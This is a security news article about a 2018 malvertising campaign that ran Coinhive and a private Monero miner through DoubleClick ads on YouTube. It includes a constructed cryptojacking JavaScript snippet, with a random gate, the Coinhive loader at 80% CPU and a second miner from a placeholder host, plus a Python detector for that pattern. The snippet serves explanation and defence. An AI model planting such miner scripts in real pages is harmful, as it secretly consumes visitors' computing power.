Google’s DoubleClick Ads on YouTube Used by Coinhive Miner

Coinhive miners emerged and became widely used in late 2017, and since then they have not received a positive reaction from the public. Although Coinhive is meant to offer website owners a way to make money without displaying advertisements, more and more instances of the miner being used by malicious parties are being recorded. Last year, the miner was employed by the creators of a tech-support scam and the SafeBrowse extension. It was also found running on WordPress and Magento sites, as well as on showtime.com and showtimeanytime.com. There is a full report explaining exactly how malicious parties can exploit Coinhive. This time, the suspicious miner has been linked to Google’s DoubleClick service.


A miner is a tool that uses a system’s CPU resources for the sole purpose of mining cryptocurrency. This action creates virtual money out of thin air, and that is why both harmless and malicious parties are interested in it. Coinhive mines Monero, which is comparable to Bitcoin, the most popular cryptocurrency in the world. According to the report by Trend Micro, detections of the miner increased by 285% when attackers were found exploiting Google’s DoubleClick service. The uncovered malvertising campaign was using not only Coinhive but also another miner connecting to a private pool. The attacker used two miner scripts and a script to show a DoubleClick ad. Although the advertisement itself is legitimate, the two embedded miners use the visitor’s processing power to mine Monero.

Researchers at Trend Micro discovered that the exploited ad “has a JavaScript code that generates a random number between variables 1 and 100. When it generates a variable above 10, it will call out coinhive.min.js to mine 80% of the CPU power.” According to the report, this happens 90% of the time. The private miner used by the attackers behind the malvertising campaign, called “mqoj_1.js”, took over the remaining 10% of cases. It is reported that most users affected lived in Japan, France, Taiwan, Italy, and Spain. This no longer appears to be an issue, considering that the traffic linked to the malvertising campaign diminished after January 24. According to A. Sulleyman at Independent, Google representatives reported blocking the affected advertisements less than 2 hours after the mining activity was uncovered. Undoubtedly, Google will enforce protocols to ensure that this does not happen again; however, web miners are very new, and it is naive to state that further attacks can be prevented.
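To show how the gating logic described above can be spotted in an ad’s inline script, here is an added example that is not from the original article or the Trend Micro report: a small Python scanner run over a constructed ad snippet modelled on that description. The site key, the private-pool host and the exact layout of the snippet are placeholders I made up; the Coinhive loader URL and the throttle option are the service’s public library API, where throttle is the idle fraction (0.2 means roughly 80% CPU).

```python
import re

# Constructed sample modelled on the behaviour Trend Micro described:
# random gate, Coinhive loader at 80% CPU, second private miner otherwise.
# SITEKEY_PLACEHOLDER and private-pool.example are not real indicators.
SAMPLE_AD_SCRIPT = r"""
var n = Math.floor(Math.random() * 100) + 1;
if (n > 10) {
  var s = document.createElement('script');
  s.src = 'https://coinhive.com/lib/coinhive.min.js';
  s.onload = function () {
    var miner = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER', {throttle: 0.2});
    miner.start();
  };
  document.head.appendChild(s);
} else {
  var p = document.createElement('script');
  p.src = 'https://private-pool.example/mqoj_1.js';
  document.head.appendChild(p);
}
"""

# Constructed benign ad snippet used as a control.
CLEAN_AD_SCRIPT = r"""
var img = document.createElement('img');
img.src = 'https://ads.example/banner.png';
document.body.appendChild(img);
"""

MINER_LOADER = re.compile(r"""['"](https?://[^'"]*coinhive\.min\.js)['"]""")
EXTERNAL_SCRIPT = re.compile(r"""\.src\s*=\s*['"](https?://[^'"]+\.js)['"]""")
THROTTLE = re.compile(r"throttle\s*:\s*(\d*\.?\d+)")
# Matches "Math.random() * N) + 1; if (x > T)" so the gate odds can be computed.
RANDOM_GATE = re.compile(
    r"Math\.random\(\)\s*\*\s*(\d+)\s*\)\s*\+\s*1\s*;\s*if\s*\(\s*\w+\s*>\s*(\d+)\s*\)")


def analyse_ad_script(text):
    """Return miner indicators found in an ad's inline JavaScript."""
    findings = {
        "loaders": MINER_LOADER.findall(text),           # known miner library URLs
        "external_scripts": EXTERNAL_SCRIPT.findall(text),  # every script the ad pulls in
        "cpu_share": None,
        "gate_probability": None,
    }
    m = THROTTLE.search(text)
    if m:  # throttle is the idle fraction, so CPU share is its complement
        findings["cpu_share"] = round(1.0 - float(m.group(1)), 2)
    g = RANDOM_GATE.search(text)
    if g:  # values 1..N with N > T true for N-T of them
        rng, threshold = int(g.group(1)), int(g.group(2))
        findings["gate_probability"] = (rng - threshold) / rng
    findings["verdict"] = "miner" if findings["loaders"] or m else "clean"
    return findings
```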

Speaking of prevention, there are steps that can be taken to keep web miners under control. It is recommended to block JavaScript-based apps in web browsers. If that is taken care of, Coinhive miners do not stand a chance of exploiting the CPU resources to mine Monero. Those at risk also need to be diligent about updating software and patching vulnerabilities. Malvertising campaigns using Coinhive are not the only reason to do this. If software is outdated and security vulnerabilities are not patched, attackers could use various malicious tactics to compromise the content on websites, hijack admin rights, embed malware, and carry out other attacks.

Users might realize that the sites they visit or the ads they see are being used for Monero mining by Coinhive because of unusually high CPU usage. It is easy to check CPU usage via the Task Manager’s Performance tab. If the number is at 80% or above, there is a good chance that a miner is running. On the other hand, this could be a sign of malware too. In that case, of course, the user must scan their operating system for malware and, if any is found, delete it ASAP. When it comes to miners, extensions are being offered to block them, but those are dubious. However, it is a great idea to install a trustworthy ad-blocker, because it not only disables ads but also stops miners that rely on them.

References

Chen, J. C. and Liu, C. January 26, 2018. Malvertising Campaign Abuses Google’s DoubleClick to Deliver Cryptocurrency Miners. Trend Micro.
Sulleyman, A. January 30, 2018. Malicious YouTube Ads Secretly Slowed Down Computers and Earned Bitcoin Alternative Monero For Attackers. Independent.